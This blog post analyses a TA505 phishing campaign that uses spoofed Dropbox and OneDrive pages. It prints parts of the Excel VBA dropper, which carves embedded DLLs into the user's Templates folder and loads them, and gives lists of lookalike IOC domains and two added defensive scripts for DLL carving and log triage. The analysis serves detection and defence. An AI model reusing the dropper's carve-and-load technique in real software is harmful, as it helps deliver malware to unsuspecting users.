Starting in September we have seen a rise in campaigns from the TA505 threat actor. They send emails in bulk with spoofed messages about files hosted on (spoofed) cloud share services. The sites look very similar to the real ones and allow download of MS Excel files and, in some cases, Word documents, which contain VBA macros that drop and execute malicious DLLs. These campaigns are dropping RATs and downloaders. More IOCs are provided at the end of the blog, but only one example is covered in this post. After all, we have to do some ‘evil code analysis.’
This particular sample ‘N98300_10.21.19.xls’ (SHA-256 6e31b0051adf99888d50d8679c329ffb9b41991e04d8b639cc01f13e5f46656f) was downloaded from hxxps://dl2.dropbox-er[.]com/?BSoFW, which spoofed a Dropbox file download page.
As soon as the file is downloaded and opened, the event below should have triggered; however, due to a compilation error it stops.
Since PtrSafe is used in both the #If and #Else blocks of the conditional compilation directive, the module fails to compile under VBA 6 or earlier, where that keyword does not exist. This macro is not backward compatible, probably a mistake by the malware author.
If we take a look at the directives, the only differences are the PtrSafe keyword in the Win64 case and the DLL file names, libDxdiag2.dll vs libDxdiag1.dll.
The function below in Module1 initializes some variables.
    Public Sub AppStart()
        Dim PointerNull As Object
        Dim SpecialPath As String
        Set PointerNull = CreateObject("WScri" + "pt.Shell") '<-- WScript.Shell object, name split to defeat string matching
        UserForm6.TextBox1.Tag = PointerNull.ExpandEnvironmentStrings("%" + UserForm6.TextBox1.Tag + "%")
        '^ contains %Temp%
        UserForm6.TextBox2.Tag = PointerNull.SpecialFolders(UserForm6.TextBox2.Tag)
        '^ contains %AppData%\Roaming\Microsoft\Windows\Templates
        ChDir (UserForm6.TextBox1.Tag)
        UserForm1.Show
    End Sub
The function ReplaceCurrentModule() in Module5 holds most of the meat of this malicious macro.

It concatenates some variables and strings to store file names:
    TextBox1Tag = %Temp%\libProject.xlsx
    ZipName = %Temp%\libProject.xlsx.zip
    ZipFolder = %Temp%
    nm = %AppData%\Roaming\Microsoft\Windows\Templates\libDxdiag1
    CNPK = 278528
    FilePosition = 1
Now the directive below may change some of the above values based on the platform:
    #If Win64 Then
        nm = UserForm6.TextBox2.Tag + "\libDxdiag2"
        CNPK = 252928
        FilePosition = 2
    #End If
After the directive ends, ".dll" is appended to the nm variable.
The function KillArray in Module6 deletes all the files, in case they are already present in the above temporary locations. The call site (shown commented out here) passes the extracted OLE object, the zip copy and the DLL path:
    'KillArray ZipFolder & "\ole" + "Obj" + "ect*.bin", ZipName, nm
    Public Sub KillArray(ParamArray PathList() As Variant)
        Dim Key As Variant
        On Error Resume Next 'ignore files that do not exist yet
        For Each Key In PathList
            Kill Key
        Next Key
        On Error GoTo 0
    End Sub

Then the function ReplaceFile saves this workbook as %Temp%\libProject.xlsx with file format 51 (xlOpenXMLWorkbook). More on the Excel file format enumeration here.
After that the same file is copied to the same folder with a .zip extension:
    FileCopy TextBox1Tag, ZipName

In the next part of this function the OLE object xl\embeddings\oleObject1.bin is copied out of the zip to the ZipFolder (%Temp%), as it contains the DLL files.
Next the below function call from Module1 is executed:
    NewValuje ZipFolder + "\oleObject" + "1" + ".b" + "in", nm, CNPK, FilePosition
This function copies the embedded DLL data out to the DLL file. All it does is search for the MZ header and then start copying.
The function parameters are:
    s = C:\Users\REM\AppData\Local\Temp\oleObject1.bin (source to copy from)
    nm = C:\Users\REM\AppData\Roaming\Microsoft\Windows\Templates\libDxdiag1.dll (DLL to copy to)
    fl = 278528 (file length)
    Variable_6 = 1 (or 2; file position); there are 2 DLLs embedded in the xls
    Public Sub NewValuje(s As String, nm As String, fl As Long, Variable_6 As Integer)
        Dim Variable_1 As Long, Variable_2 As Byte, Variable_3 As Byte, Variable_4 As Byte
        Dim Variable_5() As Long
        Dim k As Long
        ReDim Variable_5(1 To fl)
        Variable_5(1) = CByte(40 + 37) '<-- decimal 77 = M
        Variable_5(2) = CByte(40 + 50) '<-- decimal 90 = Z
        Variable_5(1 + 2) = CByte(40 + 104) '<-- decimal 144 = 0x90
        'which means the Variable_5 first 3 bytes are 4d 5a 90 (the MZ header)
        Variable_1 = FreeFile
        Open s For Binary Access Read As Variable_1
        Dim cur As Integer
        cur = 1
        Do While Not EOF(Variable_1)
            Get Variable_1, , Variable_2
            If Variable_2 = Variable_5(1) Then
                Get Variable_1, , Variable_3
                If Variable_3 = Variable_5(2) Then
                    Get Variable_1, , Variable_4
                    If Variable_4 = Variable_5(3) Then
                        If cur = Variable_6 Then 'the first file position in the 32-bit case
                            For k = 4 To fl 'copy the rest of the DLL after the 3-byte header
                                Get Variable_1, , Variable_2
                                Variable_5(k) = Variable_2
                            Next k
                            Exit Do
                        Else
                            cur = cur + 1 'skip to the second file position in the 64-bit case
                        End If
                    End If
                End If
            End If
        Loop
        Close Variable_1
        '(the write of Variable_5 to the file named by nm follows here; omitted from the listing)
    End Sub
Then the DLL file (the contents of Variable_5) is written to the location held in the nm variable.
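The same carving logic, reimplemented in Python as an added analyst tool (this is not code from the sample or from the post): given a copy of xl\embeddings\oleObject1.bin pulled out of the renamed .xlsx container, it locates the N-th MZ 90 signature exactly the way NewValuje does and returns that many bytes, so the two embedded DLLs can be recovered and hashed without ever running the macro. It also includes a full-position scanner, because the macro's state machine never rewinds after a partial match and can therefore walk past a signature that directly follows a stray "M". The sample blob is constructed for the example; the 278528/252928 lengths are the ones the macro uses.

```python
"""Analyst-side reimplementation of the MZ carving done by the macro's NewValuje.
Added example, not the macro's code. Works on an extracted oleObject1.bin so the
embedded DLLs can be carved and hashed offline."""
import hashlib
from typing import Dict, List, Optional, Tuple

# The macro builds the signature arithmetically: 40+37, 40+50, 40+104 = 4d 5a 90 ("MZ\x90").
MZ_SIG = bytes([40 + 37, 40 + 50, 40 + 104])


def macro_scan(blob: bytes, file_position: int) -> Optional[int]:
    """Offset of the file_position-th MZ 90 hit, found the way the macro finds it:
    a sequential read that consumes the 2nd and 3rd bytes even when they mismatch
    and never rewinds. Returns None when there are fewer hits than requested."""
    i, n, cur = 0, len(blob), 1
    while i < n:
        b1 = blob[i]; i += 1
        if b1 != MZ_SIG[0]:
            continue
        if i >= n:
            break
        b2 = blob[i]; i += 1   # consumed even on mismatch, as in the macro
        if b2 != MZ_SIG[1]:
            continue
        if i >= n:
            break
        b3 = blob[i]; i += 1
        if b3 != MZ_SIG[2]:
            continue
        if cur == file_position:
            return i - 3       # start of the signature
        cur += 1
    return None


def carve_macro_style(blob: bytes, file_position: int, file_length: int) -> Optional[bytes]:
    """Return file_length bytes starting at the file_position-th signature
    (position 1 / 278528 is the x86 DLL in the sample, position 2 / 252928 the x64 one).
    A result shorter than file_length means the blob ended early."""
    off = macro_scan(blob, file_position)
    if off is None:
        return None
    return blob[off:off + file_length]


def find_mz_offsets(blob: bytes) -> List[int]:
    """Every offset of MZ 90, checking all positions. Unlike macro_scan this does
    not miss a signature that follows a stray 'M' (e.g. b'MMZ\\x90')."""
    offsets, start = [], 0
    while True:
        idx = blob.find(MZ_SIG, start)
        if idx < 0:
            return offsets
        offsets.append(idx)
        start = idx + 1


def carve_all(blob: bytes, lengths: Dict[int, int]) -> Dict[int, Tuple[int, str, bytes]]:
    """Carve each requested position -> length pair; returns offset, SHA-256 hex
    digest and the bytes, keyed by position, ready for hashing and submission."""
    out: Dict[int, Tuple[int, str, bytes]] = {}
    for pos, length in sorted(lengths.items()):
        off = macro_scan(blob, pos)
        if off is None:
            continue
        data = blob[off:off + length]
        out[pos] = (off, hashlib.sha256(data).hexdigest(), data)
    return out


def build_sample_blob() -> bytes:
    """Constructed test input (not the real oleObject1.bin): filler, a decoy 'MZ'
    without the 0x90 byte, a fake 64-byte image, more filler, a fake 48-byte image."""
    img1 = MZ_SIG + b"\x00" * 5 + b"IMG1" + b"\xaa" * (64 - 12)
    img2 = MZ_SIG + b"\x00" * 5 + b"IMG2" + b"\xbb" * (48 - 12)
    decoy = b"MZ\x00"
    return b"\x01\x02" + decoy + img1 + b"filler" + img2 + b"\x00" * 4


if __name__ == "__main__":
    sample = build_sample_blob()
    for pos, (off, digest, data) in carve_all(sample, {1: 64, 2: 48}).items():
        print(f"position {pos}: offset {off}, {len(data)} bytes, sha256 {digest}")
```

On a real oleObject1.bin you would pass `{1: 278528, 2: 252928}` and compare the two digests against your sandbox or threat-intel results; if `find_mz_offsets` reports more candidates than `carve_all` recovers, the extra ones are worth a manual look.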

At the end ReplaceCurrentModule() loads the DLL using LoadLibraryW:
    GetName2 (nm) 'Already imported
and then calls the DLL's GetName function, which merely runs DLLEntryPoint.

The x64 version appears to be UPX packed.

Now this macro doesn’t do anything out of the ordinary, except for the social engineering part, where it shows a user form image resembling an installation of Office components, as if something had failed.

Of the many variants I have seen of this macro, the above sample is the only one with the compilation error.
I use urlscan.io to hunt for similar URLs, with queries like https://urlscan.io/search/#domain%3A%20googledrive-*. One can use similar queries to look for these domains. However, possibly to evade urlscan.io, the TA505 domains redirect to apple.com. I have found this to be a good indicator that a domain belongs to the same group.
Below are the other domains that look like cloud storage file download pages:
Dropbox:
dropbox-er[.]com
dropbox-download[.]com
dropbox-en[.]com
dropbox-eu[.]com

OneDrive:
onedrive-sd[.]com
onedrive-sn[.]com
onedrive-sdn[.]com
onedrive-cdn[.]com
onedrive-download-en[.]com
onedrive-download[.]com
cdn-onedrive-live[.]com
onedrive-en-live[.]com
onedrive-fn[.]com

Google Drive:
googledrive-eu[.]com
googledrive-en[.]com
googledrive-gb[.]com
googledrive-download[.]com

Box:
box-en[.]com
box-cnd[.]com <- using onehub.com

Other lesser-known services like ownCloud and Sync have also been spoofed:
own-eu-cloud[.]com
syncdownloading[.]com
sync-share[.]com
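The naming pattern above (a cloud-storage brand plus a hyphenated suffix or prefix under a fresh registrable domain) is easy to turn into a proxy-log check. The script below is an added example, not tooling from the post: it flags requests whose registrable domain is built from one of the spoofed brand names but is not one of the legitimate domains. The log lines are constructed, the legitimate-domain allow-list is an assumption, and the two-label registrable-domain rule is a deliberate simplification (a public-suffix list is needed for ccTLDs such as .co.uk).

```python
"""Lookalike cloud-share domain triage over proxy-log lines.
Added example; the allow-list and log format are assumptions for illustration."""
from typing import List, Optional, Tuple
from urllib.parse import urlsplit

# Brands spoofed in the campaign, checked longest-first so "dropbox" wins over "box".
BRAND_TOKENS = sorted(("dropbox", "onedrive", "googledrive", "box", "owncloud", "sync"),
                      key=len, reverse=True)

# Registrable domains the real services use (assumed allow-list; extend from your own).
LEGIT_APEX = {"dropbox.com", "live.com", "microsoft.com", "google.com",
              "box.com", "owncloud.com", "sync.com"}


def registrable_domain(host: str) -> str:
    """Last two labels of the host. Simplification: use a public-suffix list in production."""
    labels = host.lower().strip(".").split(".")
    return ".".join(labels[-2:])


def brand_token(label: str) -> Optional[str]:
    """Brand name if it is a whole hyphen-separated component of the label or the
    label starts with it. The boundary rule keeps 'toolbox' or 'rsync' from matching."""
    parts = label.split("-")
    for tok in BRAND_TOKENS:
        if tok in parts or label.startswith(tok):
            return tok
    return None


def classify_host(host: str) -> Tuple[str, Optional[str]]:
    """'legitimate', 'lookalike' (with the brand it imitates) or 'unrelated'."""
    apex = registrable_domain(host)
    if apex in LEGIT_APEX:
        return "legitimate", None
    tok = brand_token(apex.split(".")[0])
    return ("lookalike", tok) if tok else ("unrelated", None)


def flag_lookalikes(log_lines: List[str]) -> List[Tuple[str, str]]:
    """Parse 'timestamp user method url status' lines and return (host, brand)
    for every request to a lookalike domain, in log order."""
    hits: List[Tuple[str, str]] = []
    for line in log_lines:
        fields = line.split()
        if len(fields) < 4:
            continue
        host = urlsplit(fields[3]).hostname
        if not host:
            continue
        verdict, tok = classify_host(host)
        if verdict == "lookalike" and tok:
            hits.append((host, tok))
    return hits


# Constructed sample log; the first URL is the one the analysed sample was fetched from.
LOG_LINES = [
    "2019-10-21T09:12:44Z user17 GET https://dl2.dropbox-er.com/?BSoFW 200",
    "2019-10-21T09:13:02Z user17 GET https://www.dropbox.com/home 200",
    "2019-10-21T10:01:10Z user03 GET https://onedrive-sdn.com/download 200",
    "2019-10-21T10:05:33Z user03 GET https://onedrive.live.com/ 200",
    "2019-10-21T11:20:00Z user22 GET https://box-cnd.com/f/abc 302",
    "2019-10-21T11:25:41Z user22 GET https://syncdownloading.com/ 200",
    "2019-10-21T12:00:00Z user05 GET https://toolbox.com/ 200",
]

if __name__ == "__main__":
    for host, brand in flag_lookalikes(LOG_LINES):
        print(f"lookalike of {brand}: {host}")
```

The check is intentionally narrow: own-eu-cloud[.]com from the list above would not trip it, since the brand name is split by hyphens, so treat the output as a starting point for a urlscan.io pivot (including the apple.com redirect behaviour noted earlier) rather than a complete detection.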
Thanks to @kyleehmke and @James_inthe_box for keeping track of this campaign and tweeting the latest IOCs.